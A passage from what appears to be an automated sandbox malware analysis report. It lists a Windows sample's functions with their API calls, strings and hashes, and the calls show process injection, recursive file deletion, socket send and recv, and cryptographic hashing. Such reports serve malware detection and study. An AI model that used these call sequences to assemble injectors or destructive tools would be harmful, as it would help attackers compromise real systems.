                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Section$View$CloseUnmap$Process$CreateCurrentThread$ContextHandle_memmove_memset$MemoryResumeWrite
                                                                            • String ID: D
                                                                            • API String ID: 987980044-2746444292
                                                                            • Opcode ID: 0910b5a9ee691f5e64ef34142217752d6c5021692d9ea6f3cda5bba7375743bf
                                                                            • Instruction ID: 1a078f370e19f0c9c7e1bc804c02f6a1a15063ca90874629d73bd8f686f21e18
                                                                            • Opcode Fuzzy Hash: 0910b5a9ee691f5e64ef34142217752d6c5021692d9ea6f3cda5bba7375743bf
                                                                            • Instruction Fuzzy Hash: F1C1EAB1A00218AFDB24CFA4DD49F9EB7B9BB48704F208558F609EB290D775AA41CF51
                                                                            Function 007D3620 Relevance: 45.7, APIs: 22, Strings: 4, Instructions: 175sleepfilestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$__snwprintf_memset$FindSleep$AttributesDirectoryRemove$CloseDeleteFirstFolderFreeKnownNextPathTasklstrlen
                                                                            • String ID: %s\%s$%s\*.*$%s\System32$\\?\%s
                                                                            • API String ID: 1835786642-2457321626
                                                                            • Opcode ID: 47b4ecd0ac02d1e8d0b94436ba1760dcc4909d25f7c5bd5189d4c695910d3870
                                                                            • Instruction ID: d1289f10edd8e11d4308d710c80794259684486f28fc6fc9c7eaabbe70522ea4
                                                                            • Opcode Fuzzy Hash: 47b4ecd0ac02d1e8d0b94436ba1760dcc4909d25f7c5bd5189d4c695910d3870
                                                                            • Instruction Fuzzy Hash: C761B5B1D002189BEB24DB60DC89FE97775BB84300F0085E9F615A7280EB798F94DF61
                                                                            Function 007DCA90 Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 144memoryfilestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007DCAA5
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007DCABD
                                                                            • wnsprintfW.SHLWAPI ref: 007DCAE2
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007DCAF2
                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 007DCB10
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007DCB2F
                                                                            • lstrcmpW.KERNEL32(?,007F7444), ref: 007DCB4D
                                                                            • lstrcmpW.KERNEL32(?,007F7448), ref: 007DCB63
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007DCB88
                                                                            • wnsprintfW.SHLWAPI ref: 007DCBB9
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 007DCBE4
                                                                            • GetLastError.KERNEL32 ref: 007DCBF6
                                                                            • LocalFree.KERNEL32(?), ref: 007DCC08
                                                                            • wnsprintfW.SHLWAPI ref: 007DCC29
                                                                            • DeleteFileW.KERNEL32(00000000), ref: 007DCC36
                                                                            • FindNextFileW.KERNEL32(000000FF,?), ref: 007DCC47
                                                                            • FindClose.KERNEL32(000000FF), ref: 007DCC59
                                                                            • GetLastError.KERNEL32 ref: 007DCC69
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DCC78
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DCC82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$AllocFileFindFreewnsprintf$ErrorLastObjectSingleWaitlstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                            • String ID: %s%s$%s%s\$%s*.*
                                                                            • API String ID: 3901725581-784047915
                                                                            • Opcode ID: 3f1161a65b513d2abd1813dfbe57bd7b2172c47cdc255603fcd5bbd4a57aa2c2
                                                                            • Instruction ID: 60e046ba12fedd552d00229ca568cf848964ce3ea8f2c88a0fbf8e535b4bbca8
                                                                            • Opcode Fuzzy Hash: 3f1161a65b513d2abd1813dfbe57bd7b2172c47cdc255603fcd5bbd4a57aa2c2
                                                                            • Instruction Fuzzy Hash: 9F517FB1A0420AEBDB15EFA4DC4DFBA7779BF48301F008599F609A7291DB389941CF64
                                                                            Function 007DF9E0 Relevance: 28.7, APIs: 19, Instructions: 168networkmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 007DFA18
                                                                            • und_memcpy.LIBCMTD ref: 007DFA3D
                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 007DFA4D
                                                                            • wsprintfW.USER32 ref: 007DFA89
                                                                            • GetForegroundWindow.USER32(?), ref: 007DFAA2
                                                                            • SetWindowTextW.USER32(00000000), ref: 007DFAA9
                                                                            • WSAEventSelect.WS2_32(00000000,00000000,00000021), ref: 007DFAB9
                                                                            • WSAWaitForMultipleEvents.WS2_32(-00000001,00000000,00000000,000003E8,00000001), ref: 007DFADB
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DFB03
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DFB0D
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DFB3A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DFB44
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007DFB6A
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DFB89
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DFB93
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DFBF5
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DFBFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$CloseFreeHandle$EventWindow$AllocCreateEventsForegroundInfoLocaleMultipleSelectTextWait___crtund_memcpywsprintf
                                                                            • String ID:
                                                                            • API String ID: 924265577-0
                                                                            • Opcode ID: b815702040aaf0ed207f8fabed40679a2a718c53036c2d5c8c44a6d99a6655f3
                                                                            • Instruction ID: b1b0dd6fb3e549f34105c74da9dbceb62b57263d21b7a7821ce506bb5aafbdea
                                                                            • Opcode Fuzzy Hash: b815702040aaf0ed207f8fabed40679a2a718c53036c2d5c8c44a6d99a6655f3
                                                                            • Instruction Fuzzy Hash: EF713FB5900209EFCB14DFA4D889BAEBB75FF48304F10C55AE916A7390C7399A42CF54
                                                                            Function 007E2530 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 116librarymemoryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000318), ref: 007E2540
                                                                            • LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 007E2558
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E256B
                                                                            • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 007E2581
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E2594
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$AddressAllocLibraryLoadProc
                                                                            • String ID: NTDLL.DLL$RtlGetVersion
                                                                            • API String ID: 2539306102-196638859
                                                                            • Opcode ID: a976f09be1d790eb0fe9abfae26ad0f28870148e02fbbfe5250d183b791b8bfb
                                                                            • Instruction ID: b4f34a9be25a474b41e9d0d0448d81b7b0276c800cdf28cfdea00ff076622a7d
                                                                            • Opcode Fuzzy Hash: a976f09be1d790eb0fe9abfae26ad0f28870148e02fbbfe5250d183b791b8bfb
                                                                            • Instruction Fuzzy Hash: 8B51F374A01208EFCB14DF65D998BEDB7B8BB4C304F1085A8E50AA7251DB789F81DF50
                                                                            Function 007DF7D0 Relevance: 27.2, APIs: 18, Instructions: 162networkmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 007DF805
                                                                            • und_memcpy.LIBCMTD ref: 007DF82A
                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 007DF83A
                                                                            • WSAEventSelect.WS2_32(00000000,00000000,00000021), ref: 007DF869
                                                                            • WSAWaitForMultipleEvents.WS2_32(-00000001,00000000,00000000,00000000,00000000), ref: 007DF88A
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DF8A7
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DF8B1
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DF8D6
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DF8E0
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DF9C8
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DF9D2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$CloseFreeHandle$Event$AllocCreateEventsMultipleSelectWaitund_memcpy
                                                                            • String ID:
                                                                            • API String ID: 3749125693-0
                                                                            • Opcode ID: a8151d904d3db9640862a9111eedb7c46ed86e0a295e30878d14c6671d493a12
                                                                            • Instruction ID: 4e0b34cd3697dba3f2ad25db81b73180d3f301d2b704a48f9f7f58d8c0296ff3
                                                                            • Opcode Fuzzy Hash: a8151d904d3db9640862a9111eedb7c46ed86e0a295e30878d14c6671d493a12
                                                                            • Instruction Fuzzy Hash: 696121B5D00209EFCB04DF94D859BAEBBB5FF48304F10855AE906A7391C779AA41CF94
                                                                            Function 007DFC10 Relevance: 25.7, APIs: 17, Instructions: 154networkmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 007DFC45
                                                                            • und_memcpy.LIBCMTD ref: 007DFC6A
                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 007DFC7A
                                                                            • WSAEventSelect.WS2_32(00000000,00000000,00000022), ref: 007DFCA9
                                                                            • WSAWaitForMultipleEvents.WS2_32(-00000001,00000000,00000000,00000000,00000000), ref: 007DFCCA
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DFCE7
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DFCF1
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DFD16
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DFD20
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DFDED
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DFDF7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$CloseFreeHandle$Event$AllocCreateEventsMultipleSelectWaitund_memcpy
                                                                            • String ID:
                                                                            • API String ID: 3749125693-0
                                                                            • Opcode ID: cedf05bf3ce872f7cb7a320388b6b157ec2a6265b59382459a930e97cef9aa2e
                                                                            • Instruction ID: 233b96e6173f8802ffe932c316e96043c446a98add68079cd5d6d1c576241ae7
                                                                            • Opcode Fuzzy Hash: cedf05bf3ce872f7cb7a320388b6b157ec2a6265b59382459a930e97cef9aa2e
                                                                            • Instruction Fuzzy Hash: B5614275A00209EFDB14DFA4D859BAEBBB6FF48304F108659E906A7391C7389A41CF94
                                                                            Function 007DFE10 Relevance: 22.6, APIs: 15, Instructions: 144networkmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 007DFE45
                                                                            • und_memcpy.LIBCMTD ref: 007DFE6A
                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 007DFE7A
                                                                            • WSAEventSelect.WS2_32(00000000,00000000,00000022), ref: 007DFEA9
                                                                            • WSAWaitForMultipleEvents.WS2_32(-00000001,00000000,00000000,000003E8,00000000), ref: 007DFECB
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DFEF3
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DFEFD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DFF2A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DFF34
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007DFF56
                                                                            • WSAGetLastError.WS2_32 ref: 007DFF88
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DFFA8
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DFFB2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DFFCA
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DFFD4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$CloseFreeHandle$Event$AllocCreateErrorEventsInfoLastLocaleMultipleSelectWait___crtund_memcpy
                                                                            • String ID:
                                                                            • API String ID: 1311366638-0
                                                                            • Opcode ID: 0aaa00eeffd46e28f160525a67c542dc72ad3aa3637e58dd687625115da8b633
                                                                            • Instruction ID: d0854331b6517e1ec48b5b0c01645ae8acca1653a84c52f424679b3c2cdcbda1
                                                                            • Opcode Fuzzy Hash: 0aaa00eeffd46e28f160525a67c542dc72ad3aa3637e58dd687625115da8b633
                                                                            • Instruction Fuzzy Hash: 4D515EB5900209EFCB14DFA4D889BAEBBB5BB48304F10855AF916A7391C7389A41CF94
                                                                            Function 007DBF00 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 119encryptionsynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000,?,?,?,007C9E2A,00000000), ref: 007DBF2D
                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000,?,?,?,007C9E2A,00000000), ref: 007DBF4D
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007DBFA4
                                                                            • CryptHashData.ADVAPI32(00000000,007C9E2A,00002710,00000000), ref: 007DBFCA
                                                                            • CryptHashData.ADVAPI32(00000000,007C9E2A,00000000,00000000), ref: 007DC000
                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,007C9E2A,00000000), ref: 007DC04A
                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,007C9E2A,00000000), ref: 007DC06A
                                                                            • CryptDestroyHash.ADVAPI32(00000000,?,?,?,007C9E2A,00000000), ref: 007DC07A
                                                                            Strings
                                                                            • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 007DBF22
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Crypt$Hash$Context$DataRelease$AcquireCreateDestroyObjectSingleWait
                                                                            • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                                            • API String ID: 1452691613-63410773
                                                                            • Opcode ID: 87d732db9019961db8accf69761943ad5c46a2bdfca3078654f50dd655847dfb
                                                                            • Instruction ID: d372340a136e7a28fe1b2e2d26fcaa71bc181ac48967d5e82c8288d20dba4d09
                                                                            • Opcode Fuzzy Hash: 87d732db9019961db8accf69761943ad5c46a2bdfca3078654f50dd655847dfb
                                                                            • Instruction Fuzzy Hash: 9F414D74A00209EBDB14CF94DD99BEEB7B5FF48704F208449F605A7290C7B99A40DB90
                                                                            Function 007E0950 Relevance: 16.7, APIs: 11, Instructions: 247COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007E096D
                                                                              • Part of subcall function 007DF650: recv.WS2_32(00000000,?,000000FF,007E0A9A), ref: 007DF663
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoLocale___crtrecv
                                                                            • String ID:
                                                                            • API String ID: 818993241-0
                                                                            • Opcode ID: d2a08ac338abd3f0dd9abef821f7c33c07f0fc1e7b2754be562a5c745f4b9a37
                                                                            • Instruction ID: f9813c59b24216c48559a3e9a911ff6449eb71b812f7300cf6c1d854c6d0f5d0
                                                                            • Opcode Fuzzy Hash: d2a08ac338abd3f0dd9abef821f7c33c07f0fc1e7b2754be562a5c745f4b9a37
                                                                            • Instruction Fuzzy Hash: CDB10874901248DFDB14CF99C984BEDBBB1FF48308F248219E805AB295D7B9A9C1DF91
                                                                            Function 007E0CD0 Relevance: 16.7, APIs: 11, Instructions: 239COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007E0CED
                                                                              • Part of subcall function 007DF670: send.WS2_32(00000000,?,000000FF,007E0E0C), ref: 007DF683
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoLocale___crtsend
                                                                            • String ID:
                                                                            • API String ID: 3464212537-0
                                                                            • Opcode ID: e341f24f7a97d19955d163932bbbcbb23833510ab5fc2e67b940cb18ed7137a8
                                                                            • Instruction ID: 15cc37b3eda363bcadbba0915083cb87eaa089d08f160be007ab974ae72709bb
                                                                            • Opcode Fuzzy Hash: e341f24f7a97d19955d163932bbbcbb23833510ab5fc2e67b940cb18ed7137a8
                                                                            • Instruction Fuzzy Hash: 26B12E74A01288DFDB24CF85D985BADB7B1FF48308F208549E805AB385C7B9A9D1CF81
                                                                            Function 007C4410 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 55processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007C4424
                                                                            • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 007C444C
                                                                            • StrCmpIW.SHLWAPI(?,-00834CE4), ref: 007C4496
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007C44A4
                                                                            • Process32NextW.KERNEL32(000000FF,0000022C), ref: 007C44BE
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007C44CC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
